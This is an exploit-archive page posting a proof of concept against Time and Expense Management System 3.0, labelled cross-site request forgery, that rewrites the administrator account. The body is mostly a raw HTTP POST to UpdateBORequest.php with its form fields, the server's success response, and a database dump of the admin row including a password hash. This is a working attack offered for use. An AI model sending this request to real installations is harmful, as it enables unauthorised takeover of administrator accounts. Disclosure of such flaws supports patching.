Time And Expense Management System 3.0 Cross Site Request Forgery

Time And Expense Management System 3.0 Cross Site Request Forgery: Posted Oct 17, 2018; Authored by Ihsan Sencan; Time and Expense Management System version 3.0 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | ba7f46c02c7ebf452841ce00d148b5c187199e9b03f01e2cc69eb5adfdb2b30b; Download | Favorite | View

Time And Expense Management System 3.0 Cross Site Request Forgery

# Exploit Title: Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-10-17
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.initechs.com/
# Software Link: http://sourceforge.net/projects/tems/files/latest
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Description
# Normal member has all rights.
 
# POC: 
# 1)
# #Add,edit,delete admin+all users...
# http://localhost/[PATH]/index.php?action=ListUser
# http://localhost/[PATH]/index.php?action=BrowseUser&uid=1
# Etc..
 
#Update admin..
POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
action=EditUser&uid=1&fullname=Administrator_Edit&email=admin@admin.com&title=Administrator_Edit&joindate=10%2F17%2F2018&reportto=admin&usergroup=&language=ENG&dateformat=MDY&status=10&debuglevel=3&dbtracelevel=0&preview_receipt=1
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2018 00:46:35 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 10
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
 
# /* `exploitdb`.`users` */
# $users = array(
#   array('uid' => '1','users_id' => 'admin','fullname' => 'Administrator_Edit','password' => '5ebf8364d17c8df7e4afd586c24f84a0','email' => 'admin@admin.com','joindate' => '2018-10-17','reportto' => 'admin','title' => 'Administrator_Edit','status' => '10','authorizations_id' => '1','usergroup' => '','dateformat' => 'MDY','language' => 'ENG','u_menu_id' => '1','lastloginat' => '2018-10-17 00:46:50','access_count' => '4','debuglevel' => '3','dbtracelevel' => '0','preview_receipt' => '1','createat' => '2018-10-17 00:26:09','createby' => '*SYSTEM','changeat' => '2018-10-17 00:47:42','changeby' => 'efe')
# );

Top Authors In Last 30 Days

Red Hat 247 files
Jay Turla 150 files
indoushka 139 files
Ubuntu 61 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,066)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,731)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,807)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

Time And Expense Management System 3.0 Cross Site Request Forgery

Time And Expense Management System 3.0 Cross Site Request Forgery

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Time And Expense Management System 3.0 Cross Site Request Forgery

Share This

Time And Expense Management System 3.0 Cross Site Request Forgery

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems